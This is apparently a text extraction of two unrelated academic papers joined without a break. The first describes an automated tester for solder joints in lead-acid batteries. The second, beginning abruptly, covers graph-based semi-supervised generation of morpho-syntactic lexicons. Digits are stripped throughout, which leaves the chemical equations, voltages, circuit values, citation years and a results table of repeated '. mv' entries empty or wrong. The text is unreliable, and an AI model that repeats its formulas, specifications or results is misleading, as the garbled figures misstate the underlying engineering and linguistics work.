measurement upon the comparison of the signal and a setup value. in the meanwhile the relay contact can be used to notify the plc of the auto wire to show the condition of the battery, while rs or rs can be used to link with computer to record the welding condition of the battery. keywords: battery welding condition checking, large current charge and discharge, microprocessor. . introduction a storage battery generally includes a plurality of electrode plates [ , ], which are immersed in an electrolytic solution and interconnected sequentially in series. the series connections among the electrode plates are accomplished by soldering adjacent pairs of soldering lugs of the storage battery. if the soldering points are not firm, failure of the series connections is likely to occur. moreover, in case there is air trapped in a soldering point, breaking of the soldering point is likely to occur when a large electric current passes there through. furthermore, if government promote electric motor car for environmental protection someday, it is more important whether the pad is soldered well under the charging and discharging of large electric current [ - ]. therefore, it is necessary to find ways to determine the quality of soldering points so as to ensure the quality of a storage battery product. in this study, we invented a device for inspecting a soldering point in a storage battery which can measure the inside resistance of the battery pad. in order to judge whether pad is good, the device can provide inspection results for storage by an external processing device. in general, lead-acid batteries have pasted plate anodes employing lead as the electrode material and the electrode surface is covered with a checkerboard grid of brown pbo . the thin plates filled with active matter yield high output power. the pbo used in batteries is formed by bonding fine particles of lead oxide. these fine particles ensure a large area of contact with the electrolyte, which reduces the battery's internal resistance. the cathode plate is produced by mixing lead with dilute sulfuric acid and a small quantity of additives to form a paste-like material. cathode plates may also made from soft, porous, spongy pure lead. the gray paste is applied to a lead alloy grid, and allowed to cure and dry to form an unfinished cathode plate. a porous separator made of insulating material is inserted between the anode plate and cathode plate. the anode and cathode plates must be parallel and as close as possible, but may not be in contact. when the anode and cathode plates are arranged in an alternating arrangement, the tabs on the electrode plates are connected with soldered lead alloy straps, forming the anode and cathode elements shown in figures and . the alternating arrangement of anode and cathode elements forms a cell, as shown in figure . this cell can generate approximately v of electromotive force. because a larger plate area can yield greater current, several plates are connected in parallel in order to increase the current. to increase the voltage, two cells can be connected in series to yield v, three cells connected in series to yield v, four cells connected in series to yield v, or six cells connected in series to yield v. ordinary car batteries are generally produced in this way. the cells shown in figure employ impact-resistant expanded polypropylene (epp), which has been used to form six cells via injection molding. the anode plate and cathode plate will then be connected using soldered straps. the cathode strap from the other end of an anode output cell is soldered to the anode strap of the adjacent cell. because the shorter the current path between two cells, the smaller the resistance between the cells, adjacent cells have a through connection to minimize resistance and ensure good discharge. most car batteries employ this method. in the aforementioned six-cell battery, the cells and cell covers are bonded by thermal soldering, and each cell is sealed and separated from other cells. the cells are then filled with dilute sulfuric acid to complete the battery. when discharging, the pbo of the anode reacts with the sulfuric acid to form lead sulfate (pbso ), and the lead of the cathode reacts with the sulfuric acid to form pbso . the following chemical equations ( ) to ( ) occur during discharge [ , ]: cathode:pbo + h + +so - + e - → pbso + h o ( ) anode:pb+so - → pbso + e - ( ) battery:pb+pbo + h so → pbso + h o ( ) the following chemical equation occurs when the battery charges. pbso + h o→pb+pbo + h so ( ) reduction of pbso on the surface of the anodes to pbo is the main chemical reaction occurring during charging, but secondary reactions involving loss of water and corrosion of lead also occur as follows. pbso + h o→pbo +h so + e - + h + ( ) h o →o + h + + e - ( ) h so is also reduced to lead on the surface of the cathode, at which time the following two reactions occur at the cathode. pbso + h + + e→pb+h so ( ) h + + e - → h ( ) after charging, the pbo on the anode plate is restored, and the cathode becomes spongy as pbso on the surface absorbs electrons and is reduced to lead. in addition, the electrolysis of water leads to the release of oxygen at the anode and hydrogen at the cathode. cell covers are equipped with cocks with small vent holes. most ordinary batteries are of this type. water will be lost due to evaporation after a battery has been in use for a period of time, and deionizer water must be added after the water level falls below the minimum level. because adding water to batteries is troublesome for consumers, manufacturers developed batteries requiring no water addition. these batteries are often known as sealed lead-acid batteries (slabs); calcium, instead of antimony, is alloyed with lead in this type of battery. because the reduction of self-discharge causes the gassing point of hydrogen at the cathode to rise, the amount of hydrogen produced by electrolysis during charging is reduced in sealed batteries. the capacity of ordinary lead-acid batteries is expressed in ampere-hours (ah), which is the product of current (a) and discharge time (h). because large capacity requires a large electrode plate area and large number of parallel electrode plates, a high-capacity battery will have a large volume. a ah car battery should be able to produce a current of a for hours, which can be expressed as . c, or a current of . a for hours, which can be expressed as . c. starting a car engine requirements a transient current of approximately a- a (depending on the type of car). since the car engine is not running at this time, all power must be supplied by the battery. after float charging at a voltage of . v, a car battery normally maintains a voltage of roughly . v. the transient starting voltage will fall to around v (within three seconds), and may fall to - v if starting continues for five of six seconds. the voltage will drop more in winter than in summer. after the car starts, the generator will perform float charging of the battery at a voltage of . v. after the car is driven for a while, the charging current will gradually decrease. fig. anode plates are arranged in an alternating arrangement fig. cathode plates are arranged in an alternating arrangement fig. the cells fig. storage battery . design of an automatic testing machine for battery soldering the purpose of this research is to develop a device for inspecting a soldering point in a storage battery, which can provide inspection results for storage by an external processing device. this system shown as figure comprises a power supply unit and an inspecting unit. the power supply unit outputs a test power signal to be applied to the solder spot. the inspecting unit includes first and second inspecting terminals, and a control module. the first and second inspecting terminals are adapted to be connected electrically to the soldering point so as to detect response of the soldering point to application of the test power signal by the power supply unit. the control module determines if a detected response of the soldering point as detected through the first and second inspecting terminals falls within a predetermined range configured in the control module which generates an indication signal if the detected response falls outside the predetermined range, and generates an inspection result corresponding to the detected response. fig. (a) a schematic sectional view of a conventional storage battery to be inspected by the device according to the present invention fig. (b) a schematic view of the preferred embodiment of a device for inspecting a soldering spot in a storage battery fig. (c) a schematic block diagram of the preferred embodiment the configuration of system is shown as follows. ....... device for inspecting soldering spots in a storage battery ……. probes ……. storage battery ……. soldering spots ……. lugs ……. housing ……. power supply unit ……. inspecting unit ……. first inspecting terminals ……. second inspecting terminals ……. input module ……. control module ……. an analog-to-digital converting module ……. transmission interface ……. operating interface ……. control interface ……. indication interface ……. external processing device r ……. resistance ……. external peripheral device v ……. test source the advantages of this testing machine include that inspection of the soldering points is conducted by the inspecting unit using electrical signals, the quality of the soldering points can be accurately determined. furthermore, by outputting the inspection results through the transmission interface, the inspection results can be stored for the future evaluation of the quality if a batch of storage battery products. . soldering point signal processing design this soldering point testing machine's signal processing procedures and mechanisms are shown as follows: a.input signal: because the signal from a soldering point is small and easily disturbed by the external environment (such as electric and magnetic fields), the signal must be first processed to determine the correct signal value. b.filter circuit: this circuit is laid out as shown in figure , and has the following three main functions: )the filter circuit contains a low-pass filter comprising r and capacitor c to eliminate noise allow only the true signal to pass. )overvoltage protection is provided by the two diodes d and d . when an anomalous voltage occurs externally, the signal will remain clamped at a potential in the range of ± v, protecting ic elements. )the input impedance matching circuit relies on the high input impedance of operational amplifier u (greater m Ω) to reduce the effective load. c.amplifier circuit: this circuit serves relies on the operational amplifier and resistors r &r to amplify the small signal to a potential of vdc,which is needed for subsequent processing by the analog-to-digital circuit. the amplification formula is shown as following. ( ) in order to ensure that the operational amplifier's ib signals are the same, care must be taken to ensure that r =r ∥r . if the ib signals are not the same, changes in the ambition temperature will affect the operational amplifier's output value, causing signal bias. capacitor c in parallel with resistor r chiefly serves to eliminate signal instability due to noise from the operational amplifier at high amplifications. d.analog-to-digital circuit: because the microprocessor can only read digital signals, and cannot read analog signals, this circuit is used to convert the analog signal to a digital signal. attention must be paid to the resolution, sampling rate, and output connection when designing this circuit. the circuit is shown in figure . fig. filter circuit figure : analog to digital circuits the ti ads ic is an analog-to-digital conversion circuit employing a differential model to encode a - . vdc analog signal as a - digital signal. the resolution is bots. and it employs a cmethod. the circuit communicates with the microprocessor using scl and sda wires. the transmission rate is times/sec. e.microprocessor: an st f -bit microprocessor is responsible for reading the digital signal from the previous analog-to-digital circuit. after processing and updating by the microprocessor's internal program, the signal is sent to a display showing the current value. current values are also stored in memory, and are available for reading and use via a rs- communications cable. in addition, the microprocessor must also compare the relays' setting parameters with the current parameters; when the setting parameters are reached, a relay action signal output is sent to the corresponding relay. finally, the microprocessor must also handle editing functions from the keyboard (such as relay action settings), and update the values stored in memory. f.display: the display shows the current value, relay output status, and computer online status. the display consists of a five-section display and led circuit. the display's scanning connection with the microprocessor reduces the load on the microprocessor's i/o end. the microprocessor sends the number to be displayed to feet a-g, and also sends the potential to be displayed to the high-voltage position. this will cause the number to light up. for instance, if it is desired to display the number " ," the microprocessor will first connects feet c and f with high potential, and feet a, b, g, e, and d with low potential. it then sends high potential to d to display " ," this method is also used to send high potential to d , d , d , and d . since the scanning rate is greater than the persistence of vision, a number with five places can be seen. g.relay output: responsible for receiving signals from the microprocessor signal and activating the relay coils to change the state of relay contacts (such as by changing a normally open contact to a normally closed contact). attention must be paid to relay contact capacity, and erroneous action due to insufficient contact capacity should be avoided. h.rs- computer connection: the rs- employs the modbns-return communication mode, which involves a half duplex connection, for reading and writing. so-called half duplex refers to only being able to transmit or receive at one time, and not being able to simultaneously transmit and receive. furthermore, the communications format must be the same as that of the server for a connection to be made. for instance, communications rate: such as bits/sec. or bits/sec.; parity detection: none, odd, the stop bit may be either or . i.keyboard actions: the main keyboard functions are used in entering and editing customers' different setting points. . automatic testing system a.the automatic testing system is shown in figure . the testing steps are shown as follows. )prepare the desired testing mold (tooling). )turn switch "auto/manual" to be "manual". )turn off the power of controller (sw r). )loose screws of gate plates in front of mold(tooling) and then remove two gate plates, pull off plug then worker can remove mold. )please put on the desired mold and let the gate plates hold mold then lock the screws; put on plug. )turn off power of the weld checking controller, pull off plug on mold and loosen two fix handles on gate plate which is in front of the mold base, and remove mold. in reverse process, put on desired mold and plugs, and then turn on controller. b.the adjust steps are shown as follows. )first, adjust the distance between both guide-rails to suit the battery width. the adjusting equipment is shown in figure . open the front fix handles( pcs) and switch the type selector to be the desired type, then push guide rail to end point tightly, finally to look fix handle ( pcs). secondly, open the rear fix handles ( pcs), and adjust the inside width of guide rail larger than the battery width at mm; after that lock the fix handle( pcs). fig. automatic testing system fig. adjusting equipment )advance air b(by switch no. ) and loosen screw on air b, then accord to the testing position of battery to adjust air b position, and be sure that photo switch (phs ) is on once the front of battery is sensed shown as figure . )adjust the distance between photo sensor phs and a to fit battery length; once the first battery is sensed by photo switch phs , the air advances to hold the second battery which is shown as figure .. stopper plate fig. battery in system stopping plate fig. two batteries in system )put one battery into testing area, turn on and adjust air b (by switch no. ) to hold the front of battery and then position air b. lower air d (by switch no. ) and loosen hand wheel of up-down fixed poles and handle of forward-backward moving plate, according to the battery height (let probes touch welded surface of elements group) to adjust them and be surd each probe touches plates, and then lock the hand wheel and handle. )adjust the position of sensor phs , according to the length of battery and move it suitably (left or right) to let center of battery aim at center of air e to control ng battery position shown as figure . fig. ng battery position . experiment process and result when inspecting a storage battery, the test power signal (v ) is applied to the soldering points and the first and second inspecting terminal are coupled to the soldering points in pairs with the use of the probes. since each soldering point has a small resistance (r ), the electric currents flowing through the soldering points as a result of application of the test signal (v ) can be converted by the analog-to-digital converting module into digital signals into resistance values corresponding to the soldering points. if the resistance value of one of the soldering points is determined to be a poor connection that needs to be re-soldered. since inspection of the soldering point is conducted by the inspection unit using electrical signals, the quality of the soldering points can be accurately determined. furthermore, by outputting the inspection result through the transmission interface, the inspection result can be stored for future evaluation the quality of batch of storage battery products. the testing machine can be installed in the auto-production line to inspect the soldering points of v- ah battery. the resistance values of the soldering points are shown in figure , which are . , . , . , . and . , respectively. the results show that each tab has different inside resistance. each sampling of surface resistance isn't the same. but when the measuring value is over . , it presents that the soldering point is fail. the figure shows resistance value: . , . , . , . and . . obviously, the last value is above general situation. after inspecting this battery, we find that the stander of solders level is only up to %. in order to have more examples, we test batteries whose results are shown in table . certainly, different types of battery have different inside resistant and making the stander by examining ten batteries. of course, the inspect machine we proposed is not perfect. the manufacture has to combine with practical experience for precise inspection. when the machine was used to inspect real battery soldering points, it was found that approximately of every , batteries did not meet requirements. after individually inspecting these batteries, correction was performed and the battery then retested if the electrode tab height was uneven. afterwards, one defective product with poor soldering is on the right and left. fig. the resistance value of the soldering points are shown in meter fig. another resistance value of the soldering points are shown in meter table test results for batteries batt-spec v- ah ( . mv up badly) sport checking record (using amp) . a term solder( ) solder ( ) solder ( ) solder ( ) solder ( ) . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . mv . conclusions this study successfully developed a microprocessor controlled battery soldering point testing machine with automatic plc operation. this machine can quickly identify batteries with poor soldering points. and will not affect battery quality. in addition, the soldering point testing machine can be used in conjunction with a computer to record battery soldering point characteristics for use in subsequent battery tracking. references [ ] z. m. salameh, m. a. casacca and w. a. lynch, “a mathematical model for lead-acid batteries,” ieee trans. on energy converison,vol. , no. , oct. , pp. - . [ ] y. h. kim and h. d. ha, “design of interface circuits with electrical battery models,” ieee trans. on industrial electronics, vol. , no. , oct. , pp. - . [ ] s. sato and a. kawamura, “a new estimation method of state of charge using terminal voltage and internal resistance for lead-acid battery,” power conversion conference, vol. , , pp. - . [ ] a. kawamura and t. yanagihara, “state of charge estimation of sealed lead-acid batteries used for electric vehicles,” ieee pesc’ rec., oct. , pp. - . [ ] t. palanisamy and p. o. box, “charging techniques for a universal lead-acid battery charger”, power sources symposium, , pp. - . [ ] e.m. valeriote, t.g. chang and d.m. jochim, “fast charging of lead-acid batteries”, battery conference on applications and advances, , pp. - . [ ] c.c. hua and m.y. lin, “a study of charging control of lead-acid battery for electric vehicles,” ieee industrial electronics, vol. , , pp. - . morpho-syntactic lexicon generation using graph-based semi-supervised learning manaal faruqui carnegie mellon university mfaruqui@cs.cmu.edu ryan mcdonald google inc. ryanmcd@google.com radu soricut google inc. rsoricut@google.com abstract morpho-syntactic lexicons provide informa- tion about the morphological and syntactic roles of words in a language. such lexicons are not available for all languages and even when available, their coverage can be limited. we present a graph-based semi-supervised learning method that uses the morphologi- cal, syntactic and semantic relations between words to automatically construct wide cover- age lexicons from small seed sets. our method is language-independent, and we show that we can expand a word seed lexicon to more than times its size with high quality for languages. in addition, the automatically created lexicons provide features that improve performance in two downstream tasks: mor- phological tagging and dependency parsing. introduction morpho-syntactic lexicons contain information about the morphological attributes and syntactic roles of words in a given language. a typical lexicon contains all possible attributes that can be displayed by a word. table shows some entries in a sample english morpho-syntactic lexicon. as these lexicons contain rich linguistic information, they are useful as features in downstream nlp tasks like machine translation (nießen and ney, ; minkov et al., ; green and denero, ), part of speech tag- ging (schmid, ; denis and sagot, ; moore, ), dependency parsing (goldberg et al., ), language modeling (arisoy et al., ) and mor- phological tagging (müller and schuetze, ) in- ter alia. there are three major factors that limit the use of such lexicons in real world applications: ( ) played pos:verb, tense:past, vform:fin, . . . playing pos:verb, tense:pres, vform:ger, . . . awesome pos:adj, degree:pos table : a sample english morpho-syntactic lexicon. they are often constructed manually and are expen- sive to obtain (kokkinakis et al., ; dukes and habash, ); ( ) they are currently available for only a few languages; and ( ) size of available lexi- cons is generally small. in this paper, we present a method that takes as in- put a small seed lexicon, containing a few thousand annotated words, and outputs an automatically con- structed lexicon which contains morpho-syntactic attributes (henceforth referred to as attributes) for a large number of words of a given language. we model the problem of morpho-syntactic lexicon gen- eration as a graph-based semi-supervised learning problem (zhu, ; bengio et al., ; subra- manya and talukdar, ). we construct a graph where nodes represent word types and the goal is to label them with attributes. the seed lexicon pro- vides attributes for a subset of these nodes. nodes are connected to each other through edges that de- note features shared between them or surface mor- phological transformation between them. our entire framework of lexicon generation, in- cluding the label propagation algorithm and the fea- ture extraction module is language independent. we only use word-level morphological, semantic and syntactic relations between words that can be in- duced from unannotated corpora in an unsuper- transactions of the association for computational linguistics, vol. , pp. – , . action editor: alexander clark. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. play played playing run running clus: prefix:pl, suffix:{null}:ed prefix:pl suffix:ing:ed clus: suffix:ing suffix:{null}:ning prefix:pl suffix:{null}:ing figure : a subgraph from the complete graph of english showing different kinds of features shared on the edges between words. some possible features/edges have been removed for enhancing clarity. vised manner. one particularly novel aspect of our graph-based framework is that edges are fea- turized. some of these features measure similarity, e.g., singular nouns tend to occur in similar distri- butional contexts as other singular nouns, but some also measure transformations from one inflection to another, e.g., adding a ‘s’ suffix could indicate flip- ping the num:sing attribute to num:plur (in en- glish). for every attribute to be propagated, we learn weights over features on the edges separately. this is in contrast to traditional label propagation, where edges indicate similarity exclusively (zhu, ). we construct lexicons in languages of vary- ing morphological complexity. we perform intrin- sic evaluation of the quality of generated lexicons obtained from either the universal dependency tree- bank or created manually by humans (§ ). we show that these automatically created lexicons provide useful features in two extrinsic nlp tasks which re- quire identifying the contextually plausible morpho- logical and syntactic roles: morphological tagging (hajič and hladká, ; hajič, ) and syntactic dependency parsing (kübler et al., ). we ob- tain an average of . % and . % error reduction across languages for morphological tagging and dependency parsing respectively on a set of publicly available treebanks (§ ). we anticipate that the lexi- cons thus created will be useful in a variety of nlp problems. graph construction the approach we take propagates information over lexical graphs (§ ). in this section we describe how to construct the graph that serves as the backbone of our model. we construct a graph in which nodes are word types and directed edges are present be- tween nodes that share one or more features. edges between nodes denote that there might be a relation- ship between the attributes of the two nodes, which we intend to learn. as we want to keep our model language independent, we use edge features that can be induced between words without using any lan- guage specific tools. to this end, we describe three features in this section that can be obtained using unlabeled corpora for any given language. fig. shows a subgraph of the full graph constructed for english. word clusters. previous work has shown that un- labeled text can be used to induce unsupervised word clusters which can improve the performance of many nlp tasks in different languages (clark, ; koo et al., ; turian et al., ; faruqui and padó, ; täckström et al., ; owoputi et al., ). word clusters capture semantic and syntactic similarities between words, for example, play and run are present in the same cluster. we obtain word clusters by using exchange clustering algorithm (kneser and ney, ; martin et al., ; uszkoreit and brants, ) on large unla- beled corpus of every language. as in täckström et al. ( ), we use one year of news articles scrapped from a variety of sources and cluster only the most frequent m words into different clusters. an edge was introduced for every word pair sharing the same word cluster and a feature for the cluster is fired. thus, there are possible cluster features on an edge, though in our case only a single one can fire. suffix & prefix. suffixes are often strong indi- cators of the morpho-syntactic attributes of a word (ratnaparkhi, ; clark, ). for example, in english, -ing denotes gerund verb forms like, study- ing, playing and -ed denotes past tense like studied, played etc. prefixes like un-, in- often denote ad- jectives. thus we include both -gram and -gram some of these features can cause the graph to become very dense making label propagation prohibitive. we keep the size of the graph in check by only allowing a word node to be con- nected to at most other (randomly selected) word nodes sharing one particular feature. this reduces edges while still keeping the graph connected. suffix and prefix as edge features. we introduce an edge between two words sharing a particular suffix or prefix feature. morphological transformations. soricut and och ( ) presented an unsupervised method of inducing prefix- and suffix-based morphological transformations between words using word embed- dings. in their method, statistically, most of the transformations are induced between words with the same lemma (without using any prior information about the word lemma). for example, their method induces the transformation between played and playing as suffix:ed:ing. this feature indicates tense:past to turn off and tense:pres to turn on. we train the morphological transformation prediction tool of soricut and och ( ) on the news corpus (same as the one used for training word clusters) for each language. an edge is introduced between two words that exhibit a morphological transformation feature from one word to another as indicated by the tool’s output. motivation for the model. to motivate our model, consider the words played and playing. they have a common attribute pos:verb but they differ in tense, showing tense:past and tense:pres resp. typical graph-propagation algorithms model similarity (zhu, ) and thus propagate all at- tributes along the edges. however, we want to model if an attribute should propagate or change across an edge. for example, having a shared cluster feature, is an indication of similar pos tag (clark, ; koo et al., ; turian et al., ), but a sur- face morphological transformation feature like suf- fix:ed:ing possibly indicates a change in the tense of the word. thus, we will model attributes prop- agation/transformation as a function of the features shared on the edges between words. the features described in this section are specially suitable for languages that exhibit concatenative morphology, like english, german, greek etc. and might not work very well with languages that exhibit non- concatenative morphology i.e, where root modifica- tion is highly frequent like in arabic and hebrew. we only include those suffix and prefix which appear at least twice in the seed lexicon. our model will learn the following transformation: tense:past: → - , tense:present: - → (§ ). however, it is important to note that our framework is not limited to just the features described here, but can incorporate any arbitrary information over word pairs (§ ). graph-based label propagation we now describe our model. let w = {w ,w , . . . ,w|w|} be the vocabulary with |w| words and a = {a ,a , . . . ,a|a|} be the set of lexical attributes that words in w can ex- press; e.g. w = {played,playing, . . .} and a = {num:sing, num:plur, tense:past, . . .}. each word type w ∈ w is associated with a vec- tor aw ∈ [− , ]|a|, where ai,w = indicates that word w has attribute i and ai,w = − indicates its absence; values in between are treated as degrees of uncertainty. for example, tense:pastplayed = and tense:pastplaying = − . the vocabulary w is divided into two disjoint subsets, the labeled words l for which we know their aw’s (obtained from seed lexicon) and the un- labeled words u whose attributes are unknown. in general |u| � |l|. the words in w are organized into a directed graph with edges e between words. let, vector φ(w,v) ∈ [ , ]|f| denote the features on the directed edge between words w and v, with indicating the presence and the absence of fea- ture fk ∈ f, where, f = {f ,f , . . . ,f|f|} are the set of possible binary features shared between two words in the graph. for example, the features on edges between played and playing from fig. are: φk(played,playing) =    , iffk = suffix:ed:ing , iffk = prefix:pl , iffk = suffix:ly . . . we seek to determine which subsets of a are valid for each word w ∈ w. we learn how a particular attribute of a node is a function of that particular attribute of its neighboring nodes and features on the edge connecting them. let ai,w be an attribute of word w and let âi,w be the empirical estimate of that we constrain ai,w ∈ [− , ] as its easier to model the flip- ping of an attribute value from − to as opposed to [ , ]. we use labeled, seed, and training lexicon to mean the same thing interchangeably. < , - , …, - > < , , …, > < . , . , …, . > < , - , …, - > < . , . , …, . > <- , - , …, - > < , , …, > < , - , …, > < , , …, - > figure : word graph with edges between words showing the labeled (grey) and the unlabeled (white) word nodes. only nodes connected via solid edges are visible to each other, dotted edges block visibility. this figure demonstrates interaction between nodes during model estimation (left), label propagation (center), and paradigm projection (right). attribute-value vectors of the words are shown in angled brackets. the solid edge in the right figure shows the closest attribute paradigm to which the empirical vector is projected. attribute. we posit that âi,w can be estimated from the neighbors n(w) of w as follows: âi,w = tanh   ∑ v∈n(w) (φ(w,v) ·θi)×ai,v   ( ) where, θi ∈ r|f| is weight vector of the edge fea- tures for estimating attribute ai. ‘·’ represents dot product betwen two vectors. we use tanh as the non- linearity to make sure that âi,w ∈ [− , ]. the set of such weights θ ∈ r|a|×|f| for all attributes are the model parameters that we learn. our graph resem- bles the ising model, which is a lattice model pro- posed for describing intermolecular forces (ising, ), and eq. solves the naive mean field approx- imation of the ising model (wang et al., ). intuitively, one can view the node to node mes- sage function from v to w: φ(w,v)·θi×ai,v as either ( ) supporting the value ai,v when φ(w,v) ·θi > ; ( ) inverting ai,v when φ(w,v) · θi < ; or ( ) dampening or neutering ai,v when φ(w,v) ·θi ≈ . returning to our motivation, if w = played and v = playing, a feature indicating the suffix sub- stitution suffix:ed:ing should have a highly nega- tive weight for tense:past, indicating a change in value. this is because tense:past = - for play- ing, and a negative value of φ(w,v) ·θi will push it to positive for played. it should be noted that this framework for con- structing lexicons does not explicitly distinguish between morpho-syntactic paradigms, but simply identifies all possible attribute-values a word can take. if we consider an example like “games” and two attributes, the syntactic part-of-speech, pos, and number, num, games can either be ) {pos:verb, num:sing}, as in john games the system; or {pos:noun, num:plur}, as in the games have started. our framework will mereley return that all the above attribute-values are possi- ble, which implies that the singluar noun and plu- ral verb interpretations are valid. one possible way to account for this is to make full morphological paradigms the “attributes” in or model. but this leads to slower runtimes and sparser learning. we leave as future work extensions to full paradigm pre- diction. our framework has three critical components, each described below: ( ) model estimation, i.e., learning θ; ( ) label propagation to u; and option- ally ( ) paradigm projection to known valid morpho- logical paradigms. the overall procedure is illus- trated in figure and made concrete in algorithm . . model estimation we estimate all individual elements of an attribute vector using eq. . we define loss as the squared loss between the empirical and observed attribute vectors data: w, l, u, a, f, p result: θ, labeled u // model estimation while not convergence do for w ∈l do loss ←‖aw − âw‖ update θ using ∂loss ∂θ // label propagation while not convergence do for w ∈u do aw ← âw // paradigm projection for w ∈u do mindist ←∞, closest ←∅ for p ∈p do dist ←‖aw −p‖ if dist < mindist then mindist ← dist, closest ← p aw ← closest algorithm : graph-based semi-supervised label propagation algorithm. on every labeled node in the graph, thus the total loss can be computed as: ∑ w∈l ‖aw − âw‖ ( ) we train the edge feature weights θ by minimiz- ing the loss function in eq. . in this step, we only use labeled nodes and the edge connections between labeled nodes. as such, this is strictly a supervised learning setup. we minimize the loss function using online adaptive gradient descent (duchi et al., ) with ` regularization on the feature weights θ. this is the first step in algorithm (lines – ). . label propagation in the second step, we use the learned weights of the edge features to estimate the attribute val- ues over unlabeled nodes iteratively. the attribute vector of all unlabeled words is initialized to null, ∀w ∈ u,aw = 〈 , , . . . , 〉. in every iteration, an unlabeled node estimates its empirical attributes by looking at the corresponding attributes of its labeled and unlabeled neighbors using eq. , thus this is the semi-supervised step. we stop after the squared euclidean distance between the attribute vectors at two consecutive iterations for a node becomes less than . (averaged over all unlabeled nodes). this is the second step in algorithm (lines – ). after convergence, we can directly obtain attributes for a word by thresholding: a word w is said to possess an attribute ai if ai,w > . . paradigm projection since a word can be labeled with multiple lexical at- tributes, this is a multi-label classification problem. for such a task, several advanced methods that take into account the correlation between attributes have been proposed (ghamrawi and mccallum, ; tsoumakas and katakis, ; fürnkranz et al., ; read et al., ), here we have adopted the binary relevance method which trains a classi- fier for every attribute independently of the other at- tributes, for its simplicity (godbole and sarawagi, ; zhang and zhou, ). however, as the decision for the presence of an attribute over a word is independent of all the other attributes, the final set of attributes obtained for a word in § . might not be a valid paradigm. for ex- ample, a word cannot only exhibit the two attributes pos:noun and tense:past, since the presence of the tense attribute implies pos:verb should also be true. further, we want to utilize the inherent correlations between attribute labels to obtain bet- ter solutions. we thus present an alternative, simpler method to account for this problem. to ensure that we obtain a valid attribute paradigm, we project the empirical attribute vector obtained after propagation to the space of all valid paradigms. we first collect all observed and thus valid at- tribute paradigms from the seed lexicon (p = {aw|w ∈ l}). we replace the empirical at- tribute vector obtained in § . by a valid attribute paradigm vector which is nearest to it according to euclidean distance. this projection step is inspired from the decoding step in label-space transforma- tion approaches to multilabel classification (hsu et al., ; ferng and lin, ; zhang and schnei- der, ). this is the last step in algorithm (lines – ). we investigate for each language if paradigm a paradigm is defined as a set of attributes. |l| |w| |e| |a| |p| prop (k) (k) (m) (k) eu . bg . hr . cs . , da . en . , fi . , el . hu . it . sv . table : graph statistics for different languages, showing the approximate number of labeled seed nodes (|l|), la- beled and unlabeled nodes (|w|), edges between words (|e|), the number of unique attributes (|a|), attribute paradigms (|p|) and size of the constructed lexicon (prop). k: thousands, m: millions. projection is helpful (§ . ). intrinsic evaluation to ascertain how our graph-propagation framework predicts morphological attributes for words, we pro- vide an intrinsic evaluation where we compare pre- dicted attributes to gold lexicons that have been ei- ther read off from a treebank or derived manually. . dependency treebank lexicons the universal dependency treebank (mcdonald et al., ; de marneffe et al., ; agić et al., ) contains dependency annotations for sentences and morpho-syntactic annotations for words in context for a number of languages. a word can display dif- ferent attributes depending on its role in a sentence. in order to create morpho-syntactic lexicon for ev- ery language, we take the union of all the attributes that the word realizes in the entire treebank. al- though, it is possible that this lexicon might not con- tain all realizable attributes if a particular attribute or paradigm is not seen in the treebank (we address this issue in § . ). the utility of evaluating against treebank derived lexicons is that it allows us to eval- uate on a large set of languages. in particular, in the universal dependency treebanks v . (agić et al., we use version . released in may . ), diverse languages contain the morphology layer, including romance, germanic and slavic lan- guages plus isolates like basque and greek. we use the train/dev/test set of the treebank to cre- ate training (seed), development and test lexicons for each language. we exclude words from the dev and test lexicon that have been seen in seed lexicon. for every language, we create a graph with the fea- tures described in § with words in the seed lexicon as labeled nodes. the words from development and test set are included as unlabeled nodes for the prop- agation stage. table shows statistics about the constructed graph for different languages. we perform feature selection and hyperparame- ter tuning by optimizing prediction on words in the development lexicon and then report results on the test lexicon. the decision whether paradigm projec- tion (§ . ) is useful or not is also taken by tuning performance on the development lexicon. table shows the features that were selected for each lan- guage. now, for every word in the test lexicon we obtain predicted lexical attributes from the graph. for a given attribute, we count the number of words for which it was correctly predicted (true positive), wrongly predicted (false positive) and not predicted (false negative). aggregating these counts over all attributes (a), we compute the micro-averaged f score and achieve . % on an average across languages (cf. table ). note that this systemati- cally underestimates performance due to the effect of missing attributes/paradigms that were not ob- served in the treebank. propagated lexicons. the last column in table shows the number of words in the propagated lexi- con, and the first column shows the number of words in the seed lexicon. the ratio of the size of propa- gated and seed lexicon is different across languages, which presumably depends on how densely con- nected each language’s graph is. for example, for we only include those words in the seed lexicon that occur at least twice in the training set of the treebank. words from the news corpus used for word clustering are also used as unlabeled nodes. note that the size of the constructed lexicon (cf. table ) is always less than or equal to the total number of unlabeled nodes in the graph because some unlabeled nodes are not able to collect enough mass for acquiring an attribute i.e, ∀a ∈ a : aw < and thus they remain unlabeled (cf. § . ). clus suffix prefix morphtrans proj eu x x x bg x x hr x x x cs x x x x x da x x x en x x x fi x x el x x x x hu x x x it x x x sv x x x table : features selected and the decision of paradigm projection (proj) tuned on the development lexicon for each language. xdenotes a selected feature. english the propagated lexicon is around times larger than the seed lexicon, whereas for czech, its times larger. we can individually tune how densely connected graph we want for each language depend- ing on the seed size and feature sparsity, which we leave for future work. selected edge features. the features most fre- quently selected across all the languages are the word cluster and the surface morphological transfor- mation features. this essentially translates to hav- ing a graph that consists of small connected com- ponents of words having the same lemma (discov- ered in an unsupervised manner) with semantic links connecting such components using word cluster fea- tures. suffix features are useful for highly inflected languages like czech and greek, while the prefix feature is only useful for czech. overall, the se- lected edge features for different languages corre- spond well to the morphological structure of these languages (dryer, ). 